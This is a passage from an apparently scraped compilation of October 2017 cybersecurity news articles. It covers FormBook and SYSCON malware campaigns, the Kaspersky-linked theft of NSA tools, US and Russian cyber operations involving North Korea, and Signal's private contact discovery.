The campaigns employing PDF files to distribute the malware were using FedEx and DHL shipping/package delivery themes and a document-sharing theme. The documents, however, don’t contain malicious code, but include a link to download the payload. The malicious links recorded 716 hits across 36 countries, with the U.S. being affected the most (71% of attacks).

The email campaigns distributing FormBook via DOC and XLS files were using malicious macros for delivery. As soon as the user enabled the macro, a download URL retrieved an executable file with a PDF extension. Most of the emails targeted the United States (61% of attacks), with aerospace organizations and defense contractors being hit the most.

Emails carrying archive attachments (ZIP, RAR, ACE, and ISO) accounted for the highest distribution volume and leveraged a broad range of business related subject lines, often regarding payment or purchase orders. Most of the attacks targeted organizations in South Korea (31%) and the U.S. (22%), with the manufacturing industry being impacted the most.

The security researchers also note that FormBook was observed over the past few weeks downloading other malware families such as NanoCore.

Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says that some of the analyzed post-infection traffic was identified as pertaining to the Punkey Point of Sale (POS) malware and not FormBook. The malware was distributed through RAR archives attached to fake FedEx delivery notices.

“While FormBook is not unique in either its functionality or distribution mechanisms, its relative ease of use, affordable pricing structure, and open availability make [it] an attractive option for cyber criminals of varying skill levels. The credentials and other data harvested by successful FormBook infections could be used for additional cyber-crime activities including, but not limited to: identity theft, continued phishing operations, bank fraud and extortion,” FireEye concludes.


Germany Drops Probe Into Mass NSA Surveillance
6.10.2017 securityweek BigBrothers
Prosecutors in Germany on Thursday closed an investigation into whether US and British intelligence services systematically carried out extensive spying on the country's citizens, citing a lack of hard evidence.

The inquiry was opened after revelations in 2013 by fugitive US intelligence leaker Edward Snowden that the National Security Agency (NSA) and its British partner were conducting sweeping Internet and phone data surveillance, including in Germany.

Chancellor Angela Merkel reacted angrily at the time to news that the NSA had tapped her mobile phone, telling Washington that spying between allies "is not on".

To Germany's embarrassment, news broke in 2015 that its own BND service had helped the NSA eavesdrop on EU targets including the French presidency and the European Commission.

Germany's federal prosecution service said Thursday that it had ended its inquiry into "the possible mass collection of telecommunication data of the German population by British and US intelligence services".

It said that although the services conducted "strategic signals intelligence" and tapped online communications, there was "no hard evidence" that they "illegally, systematically and massively" monitored German telecommunications and Internet traffic.

The prosecutors said their assessment was shared by Germany's BfV domestic security service, which handles counterespionage; the IT security agency BSI; the NSA parliamentary inquiry; and the operator of a major European internet hub in Germany.

They added that the "so-called Snowden documents" had documented the US spy service's "techniques and capabilities" but provided "no concrete evidence of actual espionage activities carried out by the NSA in or against Germany".


Russia Raises Tensions in Baltic Region With Testing of Cyber Weapons
6.10.2017 securityweek BigBrothers
"Russia has opened a new battlefront with NATO," claims the Wall Street Journal. "Russia may have tested cyber warfare on Latvia," says Reuters. These are two reports about two separate incidents in the Baltic area close to Russia's largest military war games since 2013: Zapad.

There are around 4,000 NATO troops in the region. Russia claims that around 13,000 Russian troops were involved in Zapad; but NATO puts the figure at 100,000.

The first incident revolves around hacking soldiers' smartphones. Two separate methodologies have been reported: the use of drones with sophisticated electronics equipment, and in an earlier incident, a mobile telephone tower (similar to law enforcement's use of stingray equipment). The sophistication of the attacks leaves little doubt that there is some state-sponsorship involved.

In the latest attack, only six smartphones are known to have been affected. According to the WSJ, one victim, U.S. Army Lt. Col. Christopher L'Heureux, "said at least six soldiers he commands have had phones or Facebook accounts hacked. He said he suspects the incidents were meant as a message that Russian intelligence forces were tracking him, could crack his passwords and wanted to intimidate his soldiers." It remains to be seen whether additional hacks surface in the coming days.

WSJ reports, "Military cyberespionage experts said the drone flights and cellphone data collection suggest Russia is trying to monitor troop levels at NATO's new bases to see if there are more forces present there than the alliance has publicly disclosed." U.S. military officials have, however, played down its significance, suggesting it is more harassment than a security risk.

The Reuters report claims, "Moscow was probably behind interruptions in Latvia's mobile communications network before Russia's war games last month, in an apparent test of its cyber attack tools, Baltic and NATO officials said, based on early intelligence of the drills." There is conjecture here. A communications jammer aimed towards the Swedish Gotland island was switched on. "One of the edges (of the beam) affected Latvia," said Karlis Serzants, the deputy chairman of the Latvian parliament's National Security Committee.

The effect of the jammer was to take out Latvia's emergency services' 112 hotline in a disruption that lasted about seven hours. This is the first time that the service has failed, and occurred on September 13, just prior to the most intensive period of the Russian Zapad war games.

While hacking smartphones would seem to be more allied to cyber-psychological warfare, disrupting telecommunications clearly has a cyberwar potential -- for both an offensive and defensive kinetic posture.

Both incidents show classic plausible deniability. While NATO might 'know' that the Russian government is behind the phone hacks, proving it to a legal certainty remains difficult. Similarly, since the jammer was not aimed at Latvia but merely caught it a glancing blow, it could be claimed to be accidental.

The fact remains, however, that Russia will have learnt much about the practical effects of the two incidents. The Baltic would appear to be the latest area for Russian offensive cyber testing, just as the Ukraine has been in recent years. U.S. Army Lieutenant General Ben Hodges, who heads U.S. Army forces in Europe, described the incidents to reporters as a sign of the progress Russia made in electronic warfare while NATO was fighting counter-insurgency campaigns in Afghanistan.

In her first official press briefing since taking office in August, Kay Bailey Hutchison (the US envoy to NATO) said, "I think it's a big concern. It has just come to light but I think it'll be an area of discussion and most certainly I know that ourselves and our allies are going to be immediately looking into it … and try to determine how it's happening and cut it off."

NATO itself has always stressed that its cyber strategy is purely defensive. This is moot: while NATO itself might not be developing offensive capabilities, its members almost certainly are. The U.S. Cyber Command, for example, recently conducted a week long denial of service attack against against the North Korean spy agency, the Reconnaissance General Bureau.

The reality is that international state cyber incidents are continuing to escalate in line with growing geopolitical tensions.


Russian firm provides North Korea with second Internet route
6.10.2017 securityaffairs BigBrothers

Dyn Research discovered traffic coming from North Korea running over the Russian TransTeleCom network, this is the second internet route of the regime.
North Korea gets a second Internet connection thanks to the support of a state-owned Russian firm. From the perspective of security analysts, this second connection will improve in a significant way the cyber capabilities of the North Korea undermining the US efforts to isolate the state.

The availability of a second line allows Pyongyang to improve significantly the resilience against attacks on their infrastructure.

The Russian firm TransTeleCom is the company that activated the second connection, the first one was provided by China Unicom starting at least since 2010.

The discovery of the second line was reported by experts at Dyn Research that monitors global internet connectivity.

“The possibility of disconnecting North Korea from the Internet just became much more difficult,” explained said Bryce Boland, the chief technology officer in the Asia-Pacific for security firm FireEye.

north korea

A few weeks ago, the US Cyber Command has launched a massive DDoS attack against North Korea’s Reconnaissance General Bureau (RGB). The attack hit the country infrastructure between September 22 and September 30.

North Korean infrastructure is vulnerable to such kind of attacks, for this reason, the improvement of its connectivity is a priority for Pyongyang.

“As part of the campaign, U.S. Cyber Command targeted hackers in North Korea’s military spy agency, the Reconnaissance General Bureau, by barraging their computer servers with traffic that choked off Internet access.” reported The Washington Post

“The Cyber Command operation, which was due to end Saturday, was part of the overall campaign set in motion many months ago. The effects were temporary and not destructive, officials said. Nonetheless, some North Korean hackers griped that lack of access to the Internet was interfering with their work, according to another U.S. official, who also spoke on the condition of anonymity to discuss a secret operation.”

North Korea is considered one of the most dangerous states in the cyberspace due to its aggressive conduct. It has a cyber army composed of 6,800 units of cyber soldiers that were already involved in operations against targets worldwide, including the Sony hack.

This isn’t the first time the North Korea infrastructure was targeted by foreign hackers, it has already happened shortly after the Sony attack and the attack was believed to be a US retaliation.


Experts discovered a SYSCON Backdoor using FTP Server as C&C
6.10.2017 securityaffairs BigBrothers

Security researchers with Trend Micro discovered a backdoor dubbed SYSCON that uses an FTP server for command and control (C&C) purposes.
The SYSCON backdoor is spreading through tainted documents that refer North Korea and target individuals connected to the Red Cross and the World Health Organization.

syscon backdoor

The use of an FTP server as C&C is uncommon for a botnet because the associated traffic is not difficult to monitor.

“Using an FTP server has some advantages. It is less common, and this fact may allow it to slip unnoticed by administrators and researchers. However, this also leaves the C&C traffic open for monitoring by others, including security researchers. In addition, thanks to a coding mistake by the attackers, this particular backdoor does not always run the right commands.” states the analysis published SYSCON.

The experts noticed that the weaponized documents used to spread the threat contain two long strings, with Base64 encoding using a custom alphabet, a technique that was used to deliver the Sanny malware back in 2012.

“Its similarities with the earlier Sanny attack are interesting. Both attacks used relatively unusual techniques for their C&C server, their structure is similar, and the encoding key is identical. Documents somehow tied to North Korea were also used. We cannot eliminate the possibility that both Sanny and this new malware family were the work of the same threat actor.” continues the analysis.

The Base64 strings are cabinet files that contain the 32-bit and 64-bit versions of the malicious code. When the victims open the file, the appropriate cabinet file based on the OS version is being extracted into the %Temp% folder.

The file determines the operating system version and either executes a BAT file or injects a DLL into the taskhost(ex) process to execute the BAT without triggering a UAC prompt.

The Install.bat copies the main malware ipnet.dll and the configuration file ipnet.ini into the %Windows%\System32, it configures new malicious COMSysApp service using the sc command line utility, adds the service parameters into the registry, starts the malicious service, and deletes all previously created files in the %Temp% directory.

The SYSCON malware uses the computer name as an identifier, then logs into the FTP server using credentials stored in the configuration file.

The researchers discovered a URL for the byethost free FTP service provider by decoding the configuration file.

On the server side, the commands are stored in .txt files. Every time a bot processes a command, the malicious code lists all currently running processes, then sends zipped and encoded data to the server.

The list of supported commands includes copy file to temp.ini, pack it to temp.zip, encode and upload; pack file to temp.zip, encode and upload; delete config file, write string to the new config file; put file to the given path on infected system; execute command but don’t report back; and execute downloaded file.

Malware researcher noticed that the authors of the threat made a coding mistake that caused the backdoor sometimes executing the wrong commands.

The researchers have found a typo error in the command processing loop, while the malware treats the commands as strings in wide character format, a parameter in one of the functions has an incorrect file name, thus preventing the process from executing.

IT administrators should monitor any connection to external FTP servers, they can be used not just for data exfiltration, but also for C&C activity as well.


Russian spies pilfered data from NSA Contractor’s home PC running a Kaspersky AV
6.10.2017 securityaffairs BigBrothers

Russian hackers allegedly exploited Kaspersky AV to hack into NSA contractor and steal the NSA exploit code. It complicates Kaspersky’s position.
Anonymous sources have claimed Russian intelligence extracted NSA exploits from a US government contractor’s home PC using Kaspersky Lab software.

Sources told the Wall Street Journal that a malicious code allowed cyber spies to exfiltrate classified code, documentation and other sensitive data. It is alleged Kremlin hackers exploited the security package in one way or another to identify those sensitive files and exfiltrate them.

“Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.” states the Wall Street Journal.

“The hackers appear to have targeted the contractor after identifying the files through the contractor’s use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said”

The security breach occurred in 2015, but it was discovered earlier this year. Experts speculate the stolen NSA exploit code and classified documents could be compared with code included in the Shadow Brokers dump that dates back to 2013.

According to the sources, the Kaspersky antivirus discovered the NSA exploit while scanning the machines. Once detected the malicious software the antivirus sent it back to a cloud service to inspect it, it is in this phase that the Russian intelligence allegedly exploited the software to establish a backdoor to the PC.

The WSJ’s sources don’t clarify the role of the Kaspersky firm in he cyber theft, it is unclear if it helped the Russian spies or if the hackers exploited some flaws in Kaspersky software to exfiltrate the exposed documents.

Another possibility is that, under Russian law, the Russian Government forced the Kaspersky personnel to hack into the computer containing the NSA code and exfiltrate it.

Kaspersky Lab was the company that first spotted malware used by the NSA-linked Equation Group and it is likely that the Russian intelligence exploited this knowledge for espionage purposes.

kaspersky

Kaspersky Lab promptly denied any involvement, below the official statement published by the company.

“Kaspersky Lab has not been provided any evidence substantiating the company’s involvement in the alleged incident reported by the Wall Street Journal on October 5, 2017, and it is unfortunate that news coverage of unproven claims continue to perpetuate accusations about the company.

“As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight.

“We make no apologies for being aggressive in the battle against malware and cybercriminals. The company actively detects and mitigates malware infections, regardless of the source, and we have been proudly doing so for 20 years, which has led to continuous top ratings in independent malware detection tests. It’s also important to note that Kaspersky Lab products adhere to the cybersecurity industry’s strict standards and have similar levels of access and privileges to the systems they protect as any other popular security vendor in the U.S. and around the world.” – Attributable to Kaspersky Lab.

Follow
Eugene Kaspersky ✔@e_kaspersky
New conspiracy theory, anon sources media story coming. Note we make no apologies for being aggressive in the battle against cyberthreats

4:25 PM - Oct 5, 2017
105 105 Replies 105 105 Retweets 170 170 likes
Twitter Ads info and privacy
Since the US government is banning Kaspersky products from federal computers in September Kaspersky repeatedly offered up the source code of its products for officials to review.

“It’s a lot harder to beat your opponent when they’re reading your playbook, and it’s even worse when someone on your team gives it to them. If these reports are true, Russia has pulled that off,” said U.S. Senator Ben Sasse, a member of the Senate Armed Services Committee.

“The men and women of the US Intelligence Community are patriots; but, the NSA needs to get its head out of the sand and solve its contractor problem. Russia is a clear adversary in cyberspace and we can’t afford these self-inflicted injuries.”


Senator Ben Sasse ✔@SenSasse
Russia is a clear adversary in cyberspace and we can’t afford these self-inflicted injuries. https://www.sasse.senate.gov/public/index.cfm/press-releases?ID=B97F3D92-A6C1-48D8-935E-1F822754F164 …

7:51 PM - Oct 5, 2017
165 165 Replies 534 534 Retweets 1,030 1,030 likes
Twitter Ads info and privacy
The Kaspersky antivirus may have detected NSA malware being used in the wild, and intentionally or not have provided the Russian cyberspies the backdoor to steal the precious code.

Sincerely I’m disconcerted about the way such kind of code is managed by US intelligence, the code was stolen from a personal PC with running a Kaspersky Antivirus, is this the best way to keep a hacking tool?

The Senator Jeanne Shaheen (D-NH) also condemned the company and urges a strong action against the company.
“The strong ties between Kaspersky and the Kremlin are extremely alarming and have been well documented for some time,” she said today. “It’s astounding and deeply concerning that the Russian government continues to have this tool at their disposal to harm the United States.” reads the Shaheen’s statement.


North Korea Gets Second Web Connection Via Russian Firm
5.10.2017 securityweek BigBrothers
A state-owned Russian company has opened up a second internet connection for North Korea which could strengthen Pyongyang's cyber capabilities and undermine US efforts to isolate the regime, security experts said.

The activation of the new line from TransTeleCom was first detected Sunday by analysts at Dyn Research, which monitors global internet connectivity.

The new connection supplements the existing link provided by China Unicom, which has almost exclusively routed North Korean internet traffic since 2010.

The additional line gives Pyongyang "significantly more resilience against attacks on their network infrastructure," said Bryce Boland, the chief technology officer in the Asia-Pacific for cybersecurity firm FireEye.

The Washington Post reported earlier that the US Cyber Command had carried out attacks against hackers in North Korea aimed at cutting off their access to the Internet.

The operation ended Saturday, the report said.

North Korea has a 6,800-strong unit of trained cyberwarfare specialists, according to Seoul's defence ministry, and has been accused of launching high-profile cyberattacks including the 2014 hacking of Sony Pictures.

Related: U.S. Cyber Command Launched DDoS Attack Against N. Korea: Report

But with only one internet provider to rely on, the regime has often found itself vulnerable to external cyberattacks against its own network infrastructure.

North Korea suffered several internet connection failures -- some which lasted for hours -- shortly after the Sony attack, which many suspected to be a US retaliation.

With the alternate route from Russia, "the possibility of disconnecting North Korea from the Internet just became much more difficult," Boland said.


Spanish Court Agrees to Extradite Russian Hacking Suspect to US
4.10.2017 securityweek BigBrothers
Spain's High Court said Tuesday it had agreed to a US request to extradite a Russian man accused of controlling one of the world's top generators of spam and online extortion.

Peter Levashov from Saint Petersburg, a 37-year-old who goes by a string of names, was arrested at Barcelona airport on April 7 by Spanish authorities acting on a US warrant.

US prosecutors accuse the purported hacker of controlling the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransoms.

His defense team had argued that the US extradition demand was "politically motivated".

Levashov, a computer specialist, had served in the Russian army and worked for President Vladimir Putin's United Russia party, according to his lawyers.

In the course of his work he had access to confidential documents which he fears authorities in the US may demand he turn over to them if he is extradited there, the lawyers had argued.

But the High Court said in its ruling that "none of the allegations relating to the political motivation" for the extradition request "has been accepted".

Levachov has three days to appeal the court's decision.

A US federal grand jury in April slapped Levachov with an eight-count indictment. The charges include fraud, identity theft and conspiracy.

Levashov could allegedly order remotely the delivery of fraudulent spam and malicious computer viruses on behalf of whoever would pay him to do so.

US officials claim he was proud of his work and advertised the ever-improving effectiveness of his spam services with a standard price list. For legal ads, he charged $200 per million spam emails. For illegal scams and phishing attacks, it was $500 per million.

To help someone with a stock manipulation, he allegedly wanted a deposit of $5,000-$10,000 to share his list of 25 million traders. He also demanded five percent of the gains made on the stock.

During any 24-hour period, prosecutors say the botnet generated and distributed more than 2,500 unsolicited spam emails that advertised various criminal schemes.

Levashov has not been tied to Russian interference in last year's US presidential election.

But his operation depended on sending spam emails that allowed hackers to penetrate the computers of the Democratic Party to steal data. That was exactly the kind of botnet service he allegedly sold to criminals.


US Reviewing Better Tech Identifiers After Hacks: Trump Aide
3.10.2017 securityweek BigBrothers
US officials are studying ways to end the use of social security numbers for identification following a series of data breaches compromising the data for millions of Americans, a Trump administration official said Tuesday.

Rob Joyce, the White House cybersecurity coordinator, told a forum at the Washington Post that officials were studying ways to use "modern cryptographic identifiers" to replace social security numbers.

Joyce's comments come after news that some 145 million Americans may have had personal information leaked, including the important social security numbers, in a breach at Equifax, one of three big US firms which collect data for credit applications.

"I feel very strongly that the social security number has outlived its usefulness," Joyce said.

"It's a flawed system."

For years, social security numbers have been used by Americans to open bank accounts or establish their identity when applying for credit. But stolen social security numbers can be used by criminals to open bogus accounts or for other types of identity theft.

"If you think about it, every time we use the social security number we put it at risk," Joyce said.

"That is the identifier that connects you to all sort of credit and digital and information online."

He said the administration has asked officials from several agencies to come up with ideas for "a better system" which may involve cryptography.

This may involved "a public and private key" including "something that could be revoked if it has been compromised," Joyce added.

The official spoke as US lawmakers opened hearings on the Equifax breach, believed to be one of the worst because of the sensitivity of data leaked.

Former Equifax chief executive Richard Smith told a congressional panel that the breach stemmed from both human and technological error, while offering a fresh apology to consumers affected.


U.S. Cyber Command Launched DDoS Attack Against North Korea: Report
2.10.2017 securityweek BigBrothers
Non-destructive Cyber Attack Could be Considered a Warning to North Korean Regime

The United States Cyber Command has reportedly been engaged in offensive activity, namely a DDoS attack, against North Korea's military spy agency, the Reconnaissance General Bureau (RGB). The attack is thought to have commenced on September 22, and continued until September 30.

The attack occurred just five weeks after President Trump elevated U.S. Cyber Command to a Unified Combatant Command. At the time, Trump said, "The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries. Through United States Cyber Command, we will tackle our cyberspace challenges in coordination with like-minded allies and partners as we strive to respond rapidly to evolving cyberspace security threats and opportunities globally."

North Korea CyberwarThe few details currently available on this DDoS attack come from a Washington Post report published Saturday. The report says that the Reconnaissance General Bureau was targeted, "by barraging their computer servers with traffic that choked off Internet access." The effects were temporary and non-destructive. "Nonetheless, some North Korean hackers griped that lack of access to the Internet was interfering with their work, according to another [anonymous] U.S. official."

The action seems to be partly in response to North Korean cyberattacks, and partly an aspect of a wide-ranging diplomatic offensive led by Secretary of State Rex Tillerson, who was in Beijing on Saturday. "What I can tell you," said a senior administration official to the Washington Post, "is that North Korea has itself been guilty of cyberattacks, and we are going to take appropriate measures to defend our networks and systems."

That this cyber attack was non-destructive and temporary suggests it could be considered more as a warning than a punishment. It is Cyber Command telling North Korea that it has its range and is capable of much stronger action. By being non-destructive it is probably hoped that it won't provoke kinetic retaliation; although it is quite likely to provoke cyber retaliation from North Korean hacking groups.

In July 2017, researchers from Recorded Future monitored internet traffic from North Korea. One of its conclusions was that "most state-sponsored activity is perpetrated from abroad." Recorded Future suggested that North Korean malicious activity most like originates from countries such as India, Malaysia, New Zealand, Nepal, Kenya, Mozambique, and Indonesia. Under these circumstances, it is unlikely that DDoSing the homeland would have much effect on the actual hackers; although it would disrupt coordinating control from the RGB.

"DDoSing the Reconnaissance General Bureau might not affect the hackers outside of North Korea directly," F-Secure's security adviser Sean Sullivan told SecurityWeek, "but it could possibly hamper communications, forcing them to use other (potentially monitored?) channels."

His colleague, Tom Van de Wiele, agreed and added, "Or as an extra bonus, to see what procedures they would go for versus what kind of panicky moves the organization makes, that [Cyber Command] could later abuse, monitor or exploit." The suggestion here is that it wasn't just a warning shot to North Korea, but an elaborate cyber reconnaissance project.

One thing not yet known is whether China had any involvement or collusion in the action. Since Tillerson was in Beijing at the time, and since all internet traffic into and out of North Korea is through China via a China Unicom link operating since 2010, it is a tempting thought. Either way, however, this potential choke point against North Korean cyber access is in the process of weakening.

Russia, on Sunday, started providing a second internet route for North Korea. The link started showing on Dyn Research peer observance tables at around 0900 UTC on October 1. Connectivity was clearly unstable for about three hours, but stabilized after that. In effect, it went live with a stable link between Russia and North Korea shortly after the U.S. Cyber Command action finished.

The route is supplied by Russian telecommunications company TransTeleCom. TransTeleCom is a subsidiary of the Russian railway operator, and lays its fiber optic lines alongside the railway tracks. A map on the company website shows a cable running to the North Korean border. It is assumed that this cable now connects Russia and North Korea via the Friendship Bridge across the Tumen River -- the only point at which the two countries connect.

Satellite: Russia and North Korea

The cabling has apparently been in place under an agreement between TransTeleCom and Korea Posts and Telecommunications Corp since 2009. The timing coincidence of it becoming live now could imply that opening the link between the two countries is in response to the U.S. Cyber Command attack. Alternatively, it could lend weight to the F-Secure hypothesis. If Cyber Command was aware that this would be happening, the DDoS attack could have been an attempt to provoke the Reconnaissance General Bureau into revealing channels to its overseas hacking groups prior to the Russian link giving North Korea additional communications options.


Senate Passes MAIN STREET Cybersecurity Act for Small Business
29.9.2017 securityweek BigBrothers
The U.S. Senate has passed the MAIN STREET Cybersecurity Act on Sept. 28, which will require NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral that can be implemented using commercial and off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for business. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 2018.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.


Signal announces private contact discovery to improve users’privacy
29.9.2017 securityaffairs BigBrothers

Open Whisper Systems announced that it’s working on a new private contact discovery service for its popular communications app Signal.
Signal is considered the most secure instant messaging app, searching for it on the Internet it is possible to read the Edward Snowden’ testimony:

“Use anything by Open Whisper Systems” Snowden says.

The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app

Signal was also approved by the U.S. Senate for official communications among staff members.

Open Whisper Systems aims to improve the contact discovery feature, currently when a user signs up for Signal, the phone numbers in their device’s address book are compared to entries in a database on Open Whisper Systems servers to determine which interlocutors use Signal.

The verification uses truncated SHA256 hashes of the phone numbers, but as you know hashes can be cracked by attackers.

Even if Open Whisper Systems does not log contact discovery requests, theoretically a persistent attacker (i.e. APT group) can modify the code on Signal servers and starts these requests.

Signal developers are working to avoid such attack scenario leveraging in Intel’s Software Guard Extensions (SGX) technology supported by modern Intel chips.

The SGX technology allows developers to protect a certain portion of code and data from disclosure or modifications. The code is placed in a secure memory area of execution dubbed “enclave.”

“Modern Intel chips support a feature called Software Guard Extensions (SGX). SGX allows applications to provision a “secure enclave” that is isolated from the host operating system and kernel, similar to technologies like ARM’s TrustZone. SGX enclaves also support a feature called remote attestation. Remote attestation provides a cryptographic guarantee of the code that is running in a remote enclave over a network.” states Open Whisper Systems.

The idea of the Signal development team is to run contact discovery service in an SGX enclave.

The private contact discovery leveraging the SGX technology could be composed of the following steps at a high level:

Run a contact discovery service in a secure SGX enclave.
Clients that wish to perform contact discovery negotiate a secure connection over the network all the way through the remote OS to the enclave.
Clients perform remote attestation to ensure that the code which is running in the enclave is the same as the expected published open source code.
Clients transmit the encrypted identifiers from their address book to the enclave.
The enclave looks up a client’s contacts in the set of all registered users and encrypts the results back to the client.
The SGX also supports what “remote attestation” that allows the client to guarantee of the code that is running in a remote enclave over a network.

Signal app

“This would allow a server to stream media content to a client enclave with the assurance that the client software requesting the media is the “authentic” software that will play the media only once, instead of custom software that reverse engineered the network API call and will publish the media as a torrent instead.” continues Open Whisper Systems.

“Since the enclave attests to the software that’s running remotely, and since the remote server and OS have no visibility into the enclave, the service learns nothing about the contents of the client request. It’s almost as if the client is executing the query locally on the client device,” .

Open Whisper Systems plans to integrate the feature in the next few months.

If you are interested in analyzing source code for the private contact discovery service you can visit the official GitHub repository.


Signal Announces Private Contact Discovery
28.9.2017 securityweek BigBrothers
Open Whisper Systems announced this week that it’s working on a new private contact discovery service for its privacy-focused communications app Signal.

Signal has become highly popular with individuals who value their privacy, and it was recently approved even by the U.S. Senate for official use by staff members.

While communications through Signal are protected against both hackers and government snooping, there is one feature that can still be improved from a privacy standpoint, namely contact discovery.

Currently, when a user signs up for Signal, the phone numbers in their device’s address book are compared to entries in a database on Open Whisper Systems servers to determine which contacts use the messaging app. While the verification relies on truncated SHA256 hashes of the phone numbers and not cleartext data, these hashes can in most cases be cracked.Signal tests private contact discovery

In theory, this should not be a problem as Open Whisper Systems does not log contact discovery requests and makes the Signal source code publicly available in order to prove it. However, there is always the possibility that someone – including hackers or a government agency – modifies the code on Signal servers and starts logging contact discovery requests.

In order to prevent this, Signal developers have been trying to find a way to implement truly private contact discovery. The solution seems to lie in Intel’s Software Guard Extensions (SGX) technology.

Intel SGX allows application developers to protect certain pieces of code and data from disclosure or modifications by placing them in a secure area of execution in the memory called an “enclave.”

Signal developers have been working on running a contact discovery service in such an SGX enclave. When the client performs contact discovery, encrypted identifiers from the address book are transmitted over a secure connection directly to the enclave running the discovery service. The service looks up the contact information in the database of registered users and the results are sent back to the client in an encrypted form.

Another important security feature provided by SGX is that it supports what is called “remote attestation.” Remote attestation allows the client to ensure that the code running in the enclave is as expected – in Signal’s case, it ensures that the code from the enclave is the same as the source code made public by Open Whisper Systems.

“Since the enclave attests to the software that’s running remotely, and since the remote server and OS have no visibility into the enclave, the service learns nothing about the contents of the client request. It’s almost as if the client is executing the query locally on the client device,” explained Moxie Marlinspike, the founder of Open Whisper Systems.

While this sounds like a straightforward process, there are many challenges that Signal developers need to overcome. The private contact discovery service is currently a beta technology preview, but Open Whisper Systems hopes to have it integrated into clients in the next few months.

In the meantime, the source code for the private contact discovery service can be analyzed by anyone.

The use of Intel’s SGX technology can have many benefits, but researchers demonstrated recently that it can also be abused for malicious purposes. A team from an Austrian university showed in March that malware running on SGX can attack the host and extract RSA private keys.


Seoul Says North Korean Hackers Tried to Steal Bitcoins: Yonhap
27.9.2017 securityweek BigBrothers
Police investigations have pointed to North Korea as responsible for recent attempts to hack South Korea's virtual currency exchanges, a report said Wednesday.

They reached the conclusion after investigating cyber-attacks on dozens of email accounts of employees at four local bitcoin exchanges, Yonhap news agency said.

North Korea is heavily sanctioned by the United Nations for its nuclear and missile programs and speculation has been mounting that the cash-strapped regime is turning to digital currency to obtain funds.

Police said the North Korean hackers, pretending to be security authorities, sent emails containing malware between July and August this year, according to Yonhap.

The emails were sent from the same IP address linked to previous North Korean hacking attempts against Seoul, police were quoted as saying.

The test emails sent before the actual attack were traced back to the North, the report said.

No computers were compromised and no digital currency was stolen in any of the cases, the report said. Police could not be reached for comment.

South Korea is one of the world's busiest trading hubs for cryptocurrencies, with Seoul-based Bithumb ranking as the world's largest exchange for the ethereum virtual currency.

A report by FireEye earlier this month said North Korean hackers had launched attacks on at least three South Korean cryptocurrency exchanges since May.

The hackers were using "spearphishing" attacks, it said, targeting the personal email accounts of employees at the exchanges.

"It should be no surprise that cryptocurrencies, as an emerging asset class, are becoming a target of interest by a regime that operates in many ways like a criminal enterprise", it said.


US Financial Regulator Launches Unit to Police Cyber-threats
26.9.2017 securityweek BigBrothers
